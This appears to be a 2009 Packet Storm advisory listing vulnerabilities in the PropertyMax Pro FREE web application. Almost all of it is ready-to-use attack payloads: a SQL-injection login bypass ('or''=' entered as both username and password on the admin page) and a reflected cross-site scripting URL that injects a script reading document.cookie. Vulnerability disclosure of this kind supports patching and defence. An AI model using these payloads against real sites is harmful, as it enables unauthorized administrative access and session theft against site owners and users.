PropertyMax Pro FREE XSS / SQL Injection

2009-06-03T00:00:00
ID PACKETSTORM:78018
Type packetstorm
Reporter SirGod
Modified 2009-06-03T00:00:00

Description

                                        
                                            `########################################################################  
[+] PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities  
[+] Discovered By SirGod  
[+] www.mortal-team.org  
[+] www.h4cky0u.org  
#########################################################################  
  
[+] SQL Injection ( Auth Bypass)   
  
Conditions : magic_quotes_gpc = off  
  
Go to :  
  
http://127.0.0.1/path/admin  
  
Login as :   
  
Username : 'or''='  
Password : 'or''='  
  
[+] Cross-Site Scripting  
  
http://127.0.0.1/path/?op=mi&id=2&pl="><script>alert(document.cookie)</script>  
  
#########################################################################  
  
  
  
`